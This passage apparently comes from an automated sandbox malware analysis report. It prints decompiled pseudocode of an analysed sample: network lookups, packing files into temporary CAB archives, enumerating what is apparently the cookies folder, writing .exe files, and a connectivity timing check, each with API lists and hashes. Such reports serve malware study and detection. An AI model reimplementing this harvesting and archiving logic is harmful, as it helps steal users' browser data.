                								_t102 = _v9;
                								 *((char*)(_t133 + _t131 - 0x134)) = _t102;
                								if(_t102 == 0) {
                									_t104 =  &_v312;
                									_v20 = 0;
                									__imp__getaddrinfo(_t104, 0, 0,  &_v20);
                									if(_t104 == 0) {
                										_t132 = _v20;
                										while(_t132 != 0) {
                											if( *((intOrPtr*)(_t132 + 4)) == 2) {
                												E00409833( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
                												L19:
                												__imp__freeaddrinfo(_v20);
                												if(_t132 == 0) {
                													goto L12;
                												}
                												goto L20;
                											}
                											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
                										}
                										goto L19;
                									}
                									L12:
                									_v13 = 0x5b;
                									goto L20;
                								}
                								_t131 = _t131 + 1;
                								if(_t131 <= 0xff) {
                									continue;
                								}
                								goto L1;
                							}
                							goto L1;
                						}
                					}
                				}
                				L1:
                				return 0;
                			}

                APIs
                  • Part of subcall function 0040CDF1: getsockname.WS2_32(?,?,?), ref: 0040CE0F
                • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040D96D
                • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0040D9A6
                  • Part of subcall function 0040CC2C: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040CC42
                  • Part of subcall function 0040D828: getpeername.WS2_32(000000FF,00000000,00000000), ref: 0040D84C
                  • Part of subcall function 0040CA62: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0040CB02
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
                • String ID: Z
                • API String ID: 1849152701-1505515367
                • Opcode ID: 2f93316010db0cc5ac07005f390db17c976ecc66a55229d8b43d415c03685d43
                • Instruction ID: 92d7aeae0dbda4aeaaea9ad5e34d859805d1b11d83b8d52d4d0fb92601588248
                • Opcode Fuzzy Hash: 2f93316010db0cc5ac07005f390db17c976ecc66a55229d8b43d415c03685d43
                • Instruction Fuzzy Hash: 9E613872E04148AADF20EBE88C45AEFBBB59F45314F00467BF951B32C1D27C4909CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E0040E302(intOrPtr _a4) {
                				void* _t26;
                				intOrPtr _t28;
                				intOrPtr* _t34;
                				intOrPtr* _t36;
                
                				_t34 = 0;
                				if(E0040E223() != 0) {
                					_t36 = HeapAlloc( *0x41a570, 8, 0x954);
                					if(_t36 == 0) {
                						L7:
                						E0040E2E1();
                					} else {
                						_t2 = _t36 + 0x53e; // 0x53e
                						if(E0040B635(0, _t2, _a4) == 0) {
                							L6:
                							E004097F7(_t36);
                							goto L7;
                						} else {
                							_t3 = _t36 + 0x746; // 0x746
                							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t22 > 0x00000000) == 0) {
                								goto L6;
                							} else {
                								 *((intOrPtr*)(_t36 + 0x14)) = 0x7fffffff;
                								_t7 = _t36 + 0x10; // 0x10
                								 *_t7 = 0x7fffffff;
                								 *((intOrPtr*)(_t36 + 0x24)) = 1;
                								 *((intOrPtr*)(_t36 + 0x28)) = 1;
                								_t10 = _t36 + 0x132; // 0x132
                								E00409833(_t10, "cabinet.dll", 0xc);
                								_t11 = _t36 + 0x232; // 0x232
                								_t26 = E00409833(_t11, "?O", 2);
                								_t12 = _t36 + 4; // 0x4
                								_t28 =  *0x419ba4(_t12, E0040E18E, E0040DE15, E0040DE28, E0040DFB4, E0040DFE9, E0040E021, E0040E069, E0040E092, E0040E0DE, E0040E116, _t26, _t36);
                								 *_t36 = _t28;
                								if(_t28 == 0) {
                									goto L6;
                								} else {
                									_t34 = _t36;
                								}
                							}
                						}
                					}
                				}
                				return _t34;
                			}

                APIs
                  • Part of subcall function 0040E223: LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040E30A,?,0040E52E,?,?,00000000,?,?), ref: 0040E237
                  • Part of subcall function 0040E223: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040E257
                  • Part of subcall function 0040E223: GetProcAddress.KERNEL32(FCIAddFile), ref: 0040E269
                  • Part of subcall function 0040E223: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040E27B
                  • Part of subcall function 0040E223: GetProcAddress.KERNEL32(FCIDestroy), ref: 0040E28D
                  • Part of subcall function 0040E223: HeapCreate.KERNEL32(00000000,00080000,00000000,0040E52E,?,?,00000000,?,?), ref: 0040E2B8
                  • Part of subcall function 0040E223: FreeLibrary.KERNEL32(0040E52E,?,?,00000000,?,?), ref: 0040E2CD
                • HeapAlloc.KERNEL32(00000008,00000954,?,?,0040E52E,?,?,00000000,?,?), ref: 0040E320
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                • GetTempPathW.KERNEL32(00000103,00000746,0000053E,?,?,0040E52E,?,?,00000000,?,?), ref: 0040E356
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HeapLibraryPath$AllocCombineCreateFreeLoadTemp
                • String ID: cabinet.dll
                • API String ID: 3425133823-741892446
                • Opcode ID: 48aaca12982b289f30402badcb0e1551dc67d364e1bdddf6062dc352f129a5d5
                • Instruction ID: da6dce2febd5aa4fc80cf14d370decd8c3a07c9147c5ee008dac815c719a33b3
                • Opcode Fuzzy Hash: 48aaca12982b289f30402badcb0e1551dc67d364e1bdddf6062dc352f129a5d5
                • Instruction Fuzzy Hash: 3421D131680711BBD224AF669D06F5777999B04B04F104C3FB986BB2D2CAB8D4168A5C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00413108(signed char _a4, intOrPtr* _a8, intOrPtr* _a12) {
                				char _v524;
                				intOrPtr _v528;
                				intOrPtr _v532;
                				signed char _v536;
                				char _v544;
                				intOrPtr _v548;
                				intOrPtr _v552;
                				char _v556;
                				char _v572;
                				char* _t19;
                				void* _t26;
                				void* _t35;
                				void* _t38;
                
                				_v536 = _a4;
                				_t19 =  &_v524;
                				_v532 = 0;
                				_v528 = 0;
                				__imp__SHGetFolderPathW(0, 0x21, 0, 0, _t19, _t35, _t38, _t26);
                				_t44 = _t19;
                				if(_t19 == 0) {
                					E0040B4D8( &_v544, 0x402dc0, _t44, 1, 4, E0041307F,  &_v556, 0, 0, 0);
                					_t19 = E0040B635(0x402dc4,  &_v572,  &_v572);
                					_t45 = _t19;
                					if(_t19 != 0) {
                						_t19 = E0040B4D8( &_v544, 0x402dc0, _t45, 1, 4, E0041307F,  &_v556, 0, 0, 0);
                					}
                				}
                				if((_a4 & 0x00000002) != 0) {
                					 *_a8 = _v552;
                					_t19 = _v548;
                					 *_a12 = _t19;
                				}
                				return _t19;
                			}

                APIs
                • SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 00413132
                  • Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
                  • Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
                  • Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
                  • Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
                  • Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
                  • Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                  • Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040B5B6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: FindPath$FileSleep$CloseCombineFirstFolderMatchNextObjectSingleSpecWait
                • String ID: Low$+@
                • API String ID: 632153265-1076437079
                • Opcode ID: e501f04e424b4e471eea6b93678b98caa2c16635e860d5f5aa252e1b9d8a1a10
                • Instruction ID: 5e76bf7bedcab2ebf5009ea198e7bdc01d6f0d2a0432ef094aaa7b1c9b12fecb
                • Opcode Fuzzy Hash: e501f04e424b4e471eea6b93678b98caa2c16635e860d5f5aa252e1b9d8a1a10
                • Instruction Fuzzy Hash: 5411A9B2205314BBD220DE19CC45EEBBBDCEF997A4F00452EB948D7281D2709A45CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E0040B1EE(intOrPtr _a4, intOrPtr _a8) {
                				short _v524;
                				char _v1044;
                				void* __edi;
                				void* _t12;
                				void* _t21;
                				void* _t22;
                
                				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
                					L6:
                					return 0;
                				}
                				_t21 = 0;
                				while(1) {
                					_push(_a4);
                					_push(E0040B7DF());
                					_push(L"tmp");
                					_t19 =  &_v1044;
                					_t12 = E0040A4B7(_t11, 0x104,  &_v1044, L"%s%08x.%s");
                					_t22 = _t22 + 0x10;
                					if(_t12 == 0xffffffff) {
                						goto L6;
                					}
                					if(E0040B635(_t19, _a8,  &_v524) == 0 || E0040AFDF(0, _a8, 0) == 0) {
                						_t21 = _t21 + 1;
                						if(_t21 < 0x64) {
                							continue;
                						}
                						goto L6;
                					} else {
                						return 1;
                					}
                				}
                				goto L6;
                			}

                APIs
                • GetTempPathW.KERNEL32(000000F6,?), ref: 0040B205
                  • Part of subcall function 0040B7DF: GetTickCount.KERNEL32 ref: 0040B7DF
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                  • Part of subcall function 0040AFDF: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040AFF9
                  • Part of subcall function 0040AFDF: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040B019
                  • Part of subcall function 0040AFDF: CloseHandle.KERNEL32(00000000,?,0040B261,?,00000000,?,?), ref: 0040B02B
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Similarity
                • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
                • String ID: %s%08x.%s$tmp
                • API String ID: 3395140874-234517578
                • Opcode ID: ab5104a325ec2fae6a7b9564ea18a3d51a1971053e8ba385a170c57aa2ec7346
                • Instruction ID: e4ddcb2964d04d29b3f78f31bdc809782cf81d614a5e3e6b80e95d8d8fb983fc
                • Opcode Fuzzy Hash: ab5104a325ec2fae6a7b9564ea18a3d51a1971053e8ba385a170c57aa2ec7346
                • Instruction Fuzzy Hash: 8B01217110021826DE202A248C0EBEF7729DB91324F0005BBFD65B61E1D3B98D8B96DD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040E116(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				short _v524;
                				intOrPtr _t24;
                				int _t26;
                
                				_t26 = 0;
                				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E0040B1CD( &_v524) != 0) {
                					_t24 = _a4;
                					E0040A387(PathFindFileNameW( &_v524), _a8 + 0xfffffffd);
                					E00409833(_t24, "?T", 2);
                					 *((char*)(_t24 + 2)) = 0x5c;
                					_t26 = 1;
                				}
                				return _t26;
                			}

                APIs
                • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040E138
                  • Part of subcall function 0040B1CD: SetFileAttributesW.KERNEL32(?,00000080,0040B03E,?,?,0040B261,?,00000000,?,?), ref: 0040B1D6
                  • Part of subcall function 0040B1CD: DeleteFileW.KERNEL32(?,?,0040B261,?,00000000,?,?), ref: 0040B1E0
                • PathFindFileNameW.SHLWAPI(?,?,?,?), ref: 0040E167
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Similarity
                • API ID: File$Name$AttributesDeleteFindPathTemp
                • String ID: cab
                • API String ID: 394148526-1787492089
                • Opcode ID: 2812f9557eacd139aa361d6d9a6ac9e3986b8e2973455101f099709175a863ad
                • Instruction ID: 10a360aa86a383a03ab508db93b5562bfd94cb1cbc1ba417e6f76bf77114ccc2
                • Opcode Fuzzy Hash: 2812f9557eacd139aa361d6d9a6ac9e3986b8e2973455101f099709175a863ad
                • Instruction Fuzzy Hash: 7E01D632A0032467CB10ABA5CC0DF8BB7AC9F45754F0042727959F72D1DA78E9458AD4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040AEBC(intOrPtr __eax, void* __eflags) {
                				long _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				char* _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				char _v55;
                				char _v56;
                				void* __edi;
                				intOrPtr _t27;
                
                				_t27 = 0;
                				_v56 = 1;
                				_v55 = 1;
                				_v52 = 0;
                				_v48 = __eax;
                				_v44 = E0040AE3B();
                				_v40 = "http://www.google.com/webhp";
                				_v36 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_v24 = 0;
                				_v20 = 0;
                				_v16 = 0x80000;
                				_v12 = 0;
                				_v8 = GetTickCount();
                				if(E0040AD09( &_v56, 0) != 0) {
                					_t27 = GetTickCount() - _v8;
                				}
                				E004097F7(_v44);
                				return _t27;
                			}

                APIs
                  • Part of subcall function 0040AE3B: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040AE4C
                  • Part of subcall function 0040AE3B: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040AE5F
                  • Part of subcall function 0040AE3B: FreeLibrary.KERNEL32(?), ref: 0040AEB1
                • GetTickCount.KERNEL32 ref: 0040AF03
                  • Part of subcall function 0040AD09: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0040AD5D
                  • Part of subcall function 0040AD09: InternetCloseHandle.WININET(00000000), ref: 0040ADF6
                • GetTickCount.KERNEL32 ref: 0040AF15
                Strings
                • http://www.google.com/webhp, xrefs: 0040AEE3
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Similarity
                • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
                • String ID: http://www.google.com/webhp
                • API String ID: 2673491915-2670330958
                • Opcode ID: e004a83f47395af42e2ce224490dfaf15c52a71e2629c4fde7e12934fdc2b165
                • Instruction ID: eb886796597e416cf2c18be26788c6335919ce21cfc9544019f26fa1c0daef68
                • Opcode Fuzzy Hash: e004a83f47395af42e2ce224490dfaf15c52a71e2629c4fde7e12934fdc2b165
                • Instruction Fuzzy Hash: D101ECB1D113289ACF00DFE9D9856DEFFB8AF08748F10406BE800B7241D3B55A458BE5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00408399(void* __eax, WCHAR* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
                				signed int _v5;
                				void* __edi;
                				void* _t13;
                				WCHAR* _t14;
                				void* _t17;
                
                				_t14 = __ebx;
                				_t17 = __eax;
                				_v5 = 0;
                				while(1) {
                					SetFileAttributesW(_t14, 0x20);
                					if(E0040AFDF(_t17, _t14, _a4) != 0) {
                						break;
                					}
                					if(_a8 != 0 || _v5 != 0xa) {
                						Sleep((_v5 & 0x000000ff) + 0x1388);
                						_v5 = _v5 + 1;
                						continue;
                					} else {
                						_t13 = 0;
                					}
                					L7:
                					return _t13;
                				}
                				_t13 = 1;
                				goto L7;
                			}

                APIs
                • Sleep.KERNEL32(-00001388,?,00000000,?,?,00408461,00000006,?,?,?), ref: 004083C3
                • SetFileAttributesW.KERNEL32(?,00000020,.exe,?,?,?,00408461,00000006,?,?,?,?,00000000,00000000,?,?), ref: 004083CF
                  • Part of subcall function 0040AFDF: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040AFF9
                  • Part of subcall function 0040AFDF: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040B019
                  • Part of subcall function 0040AFDF: CloseHandle.KERNEL32(00000000,?,0040B261,?,00000000,?,?), ref: 0040B02B
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Similarity
                • API ID: File$AttributesCloseCreateHandleSleepWrite
                • String ID: .exe
                • API String ID: 1511598859-4119554291
                • Opcode ID: 1ede476427c31d0db83efcf41ff2d4f74a4b3d5edaa51ac5946495b1b28295c4
                • Instruction ID: 4760a81ed8100325dcb607a7829a2d5cd4f01bf134a94f53c5d1f68178b8541b
                • Opcode Fuzzy Hash: 1ede476427c31d0db83efcf41ff2d4f74a4b3d5edaa51ac5946495b1b28295c4
                • Instruction Fuzzy Hash: 28F027B180838479DF1187658D05BDE7F9C9B96714F0450ABF9C1B21D2C87E854AC729
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00412923(intOrPtr _a4) {
                				intOrPtr _v8;
                				void* __esi;
                				void* _t13;
                				intOrPtr _t18;
                				signed int _t19;
                				signed int _t22;
                				signed short _t27;
                				signed int _t31;
                				void* _t38;
                
                				_t38 = E0040A3AA(_a4);
                				if(_t38 > 0x3e8) {
                					EnterCriticalSection(0x41aa20);
                					E004097F7( *0x41aa14);
                					 *0x41aa14 =  *0x41aa14 & 0x00000000;
                					 *0x41aa1c = 0;
                					LeaveCriticalSection(0x41aa20);
                					return 0;
                				}
                				EnterCriticalSection(0x41aa20);
                				_t27 = ( *0x41aa1c & 0x0000ffff) + _t38;
                				if(_t27 <= 0x3e8) {
                					_t13 = E00409787(_t27 + _t27, 0x41aa14);
                					if(_t13 != 0) {
                						_t31 =  *0x41aa14; // 0x0
                						_t13 = E00409833(_t31 + ( *0x41aa1c & 0x0000ffff) * 2, _a4, _t38 + _t38);
                						 *0x41aa1c = _t27;
                					}
                				} else {
                					_t13 = E00409787(0x7d0, 0x41aa14);
                					if(_t13 != 0) {
                						_t18 = 0x3e8 - _t38;
                						_t19 =  *0x41aa14; // 0x0
                						E00409833(_t19, _t19 + (( *0x41aa1c & 0x0000ffff) - 0x3e8 - _t38) * 2, 0x3e8 - _t38 + _t18);
                						_t22 =  *0x41aa14; // 0x0
                						_t13 = E00409833(0x3e8 - _t38 + _t18 + _t22, _v8, _t38 + _t38);
                						 *0x41aa1c = 0x3e8;
                					}
                				}
                				LeaveCriticalSection(0x41aa20);
                				return _t13;
                			}

                APIs
                • EnterCriticalSection.KERNEL32(0041AA20,?,?,?,00412BEE,?), ref: 00412940
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • LeaveCriticalSection.KERNEL32(0041AA20,?,?,?,00412BEE,?), ref: 00412961
                • EnterCriticalSection.KERNEL32(0041AA20,?,?,?,?,00412BEE,?), ref: 00412972
                • LeaveCriticalSection.KERNEL32(0041AA20,?,?,?,00412BEE,?), ref: 00412A0C
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave$FreeHeap
                • String ID:
                • API String ID: 1946732658-0
                • Opcode ID: 28d510e95b79f1d70dc268f3e7da87de04893b8ae2bea78006c82f2ed9d17aa6
                • Instruction ID: fb987a60dc2a9060150928803f526759d5d1c7e9df67218db3e333e7884f06c2
                • Opcode Fuzzy Hash: 28d510e95b79f1d70dc268f3e7da87de04893b8ae2bea78006c82f2ed9d17aa6
                • Instruction Fuzzy Hash: B2219272511104ABC610EF99FF489FA37A5AF84388B00803BF401A31A2DB785875CB6E
                Uniqueness

                Uniqueness Score: -1.00%